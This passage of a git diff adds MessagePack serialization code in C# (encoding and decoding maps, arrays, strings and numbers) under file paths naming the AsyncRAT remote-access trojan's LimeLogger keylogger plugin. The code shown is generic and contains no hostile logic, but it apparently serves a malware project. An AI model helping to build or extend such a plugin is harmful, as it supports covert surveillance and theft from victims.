+ }
+
+ private void Clear()
+ {
+ for (int i = 0; i < children.Count; i++)
+ {
+ ((MsgPack)children[i]).Clear();
+ }
+ children.Clear();
+ }
+
+ private MsgPack InnerAdd()
+ {
+ MsgPack r = new MsgPack();
+ r.parent = this;
+ this.children.Add(r);
+ return r;
+ }
+
+ private int IndexOf(string name)
+ {
+ int i = -1;
+ int r = -1;
+
+ string tmp = name.ToLower();
+ foreach (MsgPack item in children)
+ {
+ i++;
+ if (tmp.Equals(item.lowerName))
+ {
+ r = i;
+ break;
+ }
+ }
+ return r;
+ }
+
+ public MsgPack FindObject(string name)
+ {
+ int i = IndexOf(name);
+ if (i == -1)
+ {
+ return null;
+ }
+ else
+ {
+ return this.children[i];
+ }
+ }
+
+
+ private MsgPack InnerAddMapChild()
+ {
+ if (valueType != MsgPackType.Map)
+ {
+ Clear();
+ this.valueType = MsgPackType.Map;
+ }
+ return InnerAdd();
+ }
+
+ private MsgPack InnerAddArrayChild()
+ {
+ if (valueType != MsgPackType.Array)
+ {
+ Clear();
+ this.valueType = MsgPackType.Array;
+ }
+ return InnerAdd();
+ }
+
+ public MsgPack AddArrayChild()
+ {
+ return InnerAddArrayChild();
+ }
+
+ private void WriteMap(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x80 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDE;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDF;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+ for (int i = 0; i < len; i++)
+ {
+ WriteTools.WriteString(ms, children[i].name);
+ children[i].Encode2Stream(ms);
+ }
+ }
+
+ private void WirteArray(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x90 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDC;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDD;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+
+ for (int i = 0; i < len; i++)
+ {
+ ((MsgPack)children[i]).Encode2Stream(ms);
+ }
+ }
+
+ public void SetAsInteger(Int64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Integer;
+ }
+
+ public void SetAsUInt64(UInt64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.UInt64;
+ }
+
+ public UInt64 GetAsUInt64()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToUInt64((Int64)this.innerValue);
+ case MsgPackType.UInt64:
+ return (UInt64)this.innerValue;
+ case MsgPackType.String:
+ return UInt64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToUInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToUInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToUInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+
+ }
+
+ public Int64 GetAsInteger()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return (Int64)this.innerValue;
+ case MsgPackType.UInt64:
+ return Convert.ToInt64((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Int64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+ public Double GetAsFloat()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToDouble((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Double.Parse((String)this.innerValue);
+ case MsgPackType.Float:
+ return (Double)this.innerValue;
+ case MsgPackType.Single:
+ return (Single)this.innerValue;
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+
+ public void SetAsBytes(byte[] value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Binary;
+ }
+
+ public byte[] GetAsBytes()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return BitConverter.GetBytes((Int64)this.innerValue);
+ case MsgPackType.String:
+ return BytesTools.GetUtf8Bytes(this.innerValue.ToString());
+ case MsgPackType.Float:
+ return BitConverter.GetBytes((Double)this.innerValue);
+ case MsgPackType.Single:
+ return BitConverter.GetBytes((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ long dateval = ((DateTime)this.innerValue).ToBinary();
+ return BitConverter.GetBytes(dateval);
+ case MsgPackType.Binary:
+ return (byte[])this.innerValue;
+ default:
+ return new byte[] { };
+ }
+ }
+
+ public void Add(string key, String value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsString(value);
+ }
+
+ public void Add(string key, int value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsInteger(value);
+ }
+
+ public bool LoadFileAsBytes(string fileName)
+ {
+ if (File.Exists(fileName))
+ {
+ byte[] value = null;
+ FileStream fs = new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.Read);
+ value = new byte[fs.Length];
+ fs.Read(value, 0, (int)fs.Length);
+ fs.Close();
+ fs.Dispose();
+ SetAsBytes(value);
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+
+ }
+
+ public bool SaveBytesToFile(string fileName)
+ {
+ if (this.innerValue != null)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Append);
+ fs.Write(((byte[])this.innerValue), 0, ((byte[])this.innerValue).Length);
+ fs.Close();
+ fs.Dispose();
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+ }
+
+ public MsgPack ForcePathObject(string path)
+ {
+ MsgPack tmpParent, tmpObject;
+ tmpParent = this;
+ string[] pathList = path.Trim().Split(new Char[] { '.', '/', '\\' });
+ string tmp = null;
+ if (pathList.Length == 0)
+ {
+ return null;
+ }
+ else if (pathList.Length > 1)
+ {
+ for (int i = 0; i < pathList.Length - 1; i++)
+ {
+ tmp = pathList[i];
+ tmpObject = tmpParent.FindObject(tmp);
+ if (tmpObject == null)
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ }
+ else
+ {
+ tmpParent = tmpObject;
+ }
+ }
+ }
+ tmp = pathList[pathList.Length - 1];
+ int j = tmpParent.IndexOf(tmp);
+ if (j > -1)
+ {
+ return tmpParent.children[j];
+ }
+ else
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ return tmpParent;
+ }
+ }
+
+ public void SetAsNull()
+ {
+ Clear();
+ this.innerValue = null;
+ this.valueType = MsgPackType.Null;
+ }
+
+ public void SetAsString(String value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.String;
+ }
+
+ public String GetAsString()
+ {
+ if (this.innerValue == null)
+ {
+ return "";
+ }
+ else
+ {
+ return this.innerValue.ToString();
+ }
+
+ }
+
+ public void SetAsBoolean(Boolean bVal)
+ {
+ this.valueType = MsgPackType.Boolean;
+ this.innerValue = bVal;
+ }
+
+ public void SetAsSingle(Single fVal)
+ {
+ this.valueType = MsgPackType.Single;
+ this.innerValue = fVal;
+ }
+
+ public void SetAsFloat(Double fVal)
+ {
+ this.valueType = MsgPackType.Float;
+ this.innerValue = fVal;
+ }
+
+
+
+ public void DecodeFromBytes(byte[] bytes)
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ ms.Write(bytes, 0, bytes.Length);
+ ms.Position = 0;
+ DecodeFromStream(ms);
+ }
+ }
+
+ public void DecodeFromFile(string fileName)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Open);
+ DecodeFromStream(fs);
+ fs.Dispose();
+ }
+
+
+
+ public void DecodeFromStream(Stream ms)
+ {
+ byte lvByte = (byte)ms.ReadByte();
+ byte[] rawByte = null;
+ MsgPack msgPack = null;
+ int len = 0;
+ int i = 0;
+
+ if (lvByte <= 0x7F)
+ { //positive fixint 0xxxxxxx 0x00 - 0x7f
+ SetAsInteger(lvByte);
+ }
+ else if ((lvByte >= 0x80) && (lvByte <= 0x8F))
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ len = lvByte - 0x80;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0x90) && (lvByte <= 0x9F)) //fixarray 1001xxxx 0x90 - 0x9f
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ len = lvByte - 0x90;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0xA0) && (lvByte <= 0xBF)) // fixstr 101xxxxx 0xa0 - 0xbf
+ {
+ len = lvByte - 0xA0;
+ SetAsString(ReadTools.ReadString(ms, len));
+ }
+ else if ((lvByte >= 0xE0) && (lvByte <= 0xFF))
+ { /// -1..-32
+ // negative fixnum stores 5-bit negative integer
+ // +--------+
+ // |111YYYYY|
+ // +--------+
+ SetAsInteger((sbyte)lvByte);
+ }
+ else if (lvByte == 0xC0)
+ {
+ SetAsNull();
+ }
+ else if (lvByte == 0xC1)
+ {
+ throw new Exception("(never used) type $c1");
+ }
+ else if (lvByte == 0xC2)
+ {
+ SetAsBoolean(false);
+ }
+ else if (lvByte == 0xC3)
+ {
+ SetAsBoolean(true);
+ }
+ else if (lvByte == 0xC4)
+ { // max 255
+ len = ms.ReadByte();
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC5)
+ { // max 65535
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToUInt16(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC6)
+ { // binary max: 2^32-1
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if ((lvByte == 0xC7) || (lvByte == 0xC8) || (lvByte == 0xC9))
+ {
+ throw new Exception("(ext8,ext16,ex32) type $c7,$c8,$c9");
+ }
+ else if (lvByte == 0xCA)
+ { // float 32
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+
+ SetAsSingle(BitConverter.ToSingle(rawByte, 0));
+ }
+ else if (lvByte == 0xCB)
+ { // float 64
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsFloat(BitConverter.ToDouble(rawByte, 0));
+ }
+ else if (lvByte == 0xCC)
+ { // uint8
+ // uint 8 stores a 8-bit unsigned integer
+ // +--------+--------+
+ // | 0xcc |ZZZZZZZZ|
+ // +--------+--------+
+ lvByte = (byte)ms.ReadByte();
+ SetAsInteger(lvByte);
+ }
+ else if (lvByte == 0xCD)
+ { // uint16
+ // uint 16 stores a 16-bit big-endian unsigned integer
+ // +--------+--------+--------+
+ // | 0xcd |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xCE)
+ {
+ // uint 32 stores a 32-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xce |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xCF)
+ {
+ // uint 64 stores a 64-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xcf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsUInt64(BitConverter.ToUInt64(rawByte, 0));
+ }
+ else if (lvByte == 0xDC)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdc |YYYYYYYY|YYYYYYYY| N objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDD)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdd |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xD9)
+ {
+ // str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ // +--------+--------+========+
+ // | 0xd9 |YYYYYYYY| data |
+ // +--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDF)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N*2 objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDA)
+ {
+ // str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ // +--------+--------+--------+========+
+ // | 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ // +--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDB)
+ {
+ // str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ // +--------+--------+--------+--------+--------+========+
+ // | 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ // +--------+--------+--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xD0)
+ {
+ // int 8 stores a 8-bit signed integer
+ // +--------+--------+
+ // | 0xd0 |ZZZZZZZZ|
+ // +--------+--------+
+ SetAsInteger((sbyte)ms.ReadByte());
+ }
+ else if (lvByte == 0xD1)
+ {
+ // int 16 stores a 16-bit big-endian signed integer
+ // +--------+--------+--------+
+ // | 0xd1 |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xD2)
+ {
+ // int 32 stores a 32-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xd2 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xD3)
+ {
+ // int 64 stores a 64-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xd3 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt64(rawByte, 0));
+ }
+ }
+
+ public byte[] Encode2Bytes()
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ Encode2Stream(ms);
+ byte[] r = new byte[ms.Length];
+ ms.Position = 0;
+ ms.Read(r, 0, (int)ms.Length);
+ return r;
+ }
+ }
+
+ public void Encode2Stream(Stream ms)
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Unknown:
+ case MsgPackType.Null:
+ WriteTools.WriteNull(ms);
+ break;
+ case MsgPackType.String:
+ WriteTools.WriteString(ms, (String)this.innerValue);
+ break;
+ case MsgPackType.Integer:
+ WriteTools.WriteInteger(ms, (Int64)this.innerValue);
+ break;
+ case MsgPackType.UInt64:
+ WriteTools.WriteUInt64(ms, (UInt64)this.innerValue);
+ break;
+ case MsgPackType.Boolean:
+ WriteTools.WriteBoolean(ms, (Boolean)this.innerValue);
+ break;
+ case MsgPackType.Float:
+ WriteTools.WriteFloat(ms, (Double)this.innerValue);
+ break;
+ case MsgPackType.Single:
+ WriteTools.WriteFloat(ms, (Single)this.innerValue);
+ break;
+ case MsgPackType.DateTime:
+ WriteTools.WriteInteger(ms, GetAsInteger());
+ break;
+ case MsgPackType.Binary:
+ WriteTools.WriteBinary(ms, (byte[])this.innerValue);
+ break;
+ case MsgPackType.Map:
+ WriteMap(ms);
+ break;
+ case MsgPackType.Array:
+ WirteArray(ms);
+ break;
+ default:
+ WriteTools.WriteNull(ms);
+ break;
+ }
+ }
+
+ public String AsString
+ {
+ get
+ {
+ return GetAsString();
+ }
+ set
+ {
+ SetAsString(value);
+ }
+ }
+
+ public Int64 AsInteger
+ {
+ get { return GetAsInteger(); }
+ set { SetAsInteger((Int64)value); }
+ }
+
+ public Double AsFloat
+ {
+ get { return GetAsFloat(); }
+ set { SetAsFloat(value); }
+ }
+ public MsgPackArray AsArray
+ {
+ get
+ {
+ lock (this)
+ {
+ if (refAsArray == null)
+ {
+ refAsArray = new MsgPackArray(this, children);
+ }
+ }
+ return refAsArray;
+ }
+ }
+
+
+ public MsgPackType ValueType
+ {
+ get { return valueType; }
+ }
+
+
+ IEnumerator IEnumerable.GetEnumerator()
+ {
+ return new MsgPackEnum(children);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/MsgPackType.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/MsgPackType.cs
new file mode 100644
index 0000000..2567ae6
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/MsgPackType.cs
@@ -0,0 +1,24 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public enum MsgPackType
+ {
+ Unknown = 0,
+ Null = 1,
+ Map = 2,
+ Array = 3,
+ String = 4,
+ Integer = 5,
+ UInt64 = 6,
+ Boolean = 7,
+ Float = 8,
+ Single = 9,
+ DateTime = 10,
+ Binary = 11
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/ReadTools.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/ReadTools.cs
new file mode 100644
index 0000000..9e85968
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/ReadTools.cs
@@ -0,0 +1,84 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ class ReadTools
+ {
+ public static String ReadString(Stream ms, int len)
+ {
+ byte[] rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+
+ public static String ReadString(Stream ms)
+ {
+ byte strFlag = (byte)ms.ReadByte();
+ return ReadString(strFlag, ms);
+ }
+
+ public static String ReadString(byte strFlag, Stream ms)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = null;
+ int len = 0;
+ if ((strFlag >= 0xA0) && (strFlag <= 0xBF))
+ {
+ len = strFlag - 0xA0;
+ }
+ else if (strFlag == 0xD9)
+ {
+ len = ms.ReadByte();
+ }
+ else if (strFlag == 0xDA)
+ {
+ rawBytes = new byte[2];
+ ms.Read(rawBytes, 0, 2);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToUInt16(rawBytes, 0);
+ }
+ else if (strFlag == 0xDB)
+ {
+ rawBytes = new byte[4];
+ ms.Read(rawBytes, 0, 4);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToInt32(rawBytes, 0);
+ }
+ rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/WriteTools.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/WriteTools.cs
new file mode 100644
index 0000000..3de69fa
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/WriteTools.cs
@@ -0,0 +1,199 @@
+using System;
+using System.IO;
+
+namespace Plugin.MessagePack
+{
+ class WriteTools
+ {
+ public static void WriteNull(Stream ms)
+ {
+ ms.WriteByte(0xC0);
+ }
+
+ public static void WriteString(Stream ms, String strVal)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = BytesTools.GetUtf8Bytes(strVal);
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 31)
+ {
+ b = (byte)(0xA0 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 255)
+ {
+ b = 0xD9;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDA;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDB;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+ public static void WriteBinary(Stream ms, byte[] rawBytes)
+ {
+
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 255)
+ {
+ b = 0xC4;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xC5;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xC6;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+
+ public static void WriteFloat(Stream ms, Double fVal)
+ {
+ ms.WriteByte(0xCB);
+ ms.Write(BytesTools.SwapDouble(fVal), 0, 8);
+ }
+
+ public static void WriteSingle(Stream ms, Single fVal)
+ {
+ ms.WriteByte(0xCA);
+ ms.Write(BytesTools.SwapBytes(BitConverter.GetBytes(fVal)), 0, 4);
+ }
+
+ public static void WriteBoolean(Stream ms, Boolean bVal)
+ {
+ if (bVal)
+ {
+ ms.WriteByte(0xC3);
+ }
+ else
+ {
+ ms.WriteByte(0xC2);
+ }
+ }
+
+
+ public static void WriteUInt64(Stream ms, UInt64 iVal)
+ {
+ ms.WriteByte(0xCF);
+ byte[] dataBytes = BitConverter.GetBytes(iVal);
+ ms.Write(BytesTools.SwapBytes(dataBytes), 0, 8);
+ }
+
+ public static void WriteInteger(Stream ms, Int64 iVal)
+ {
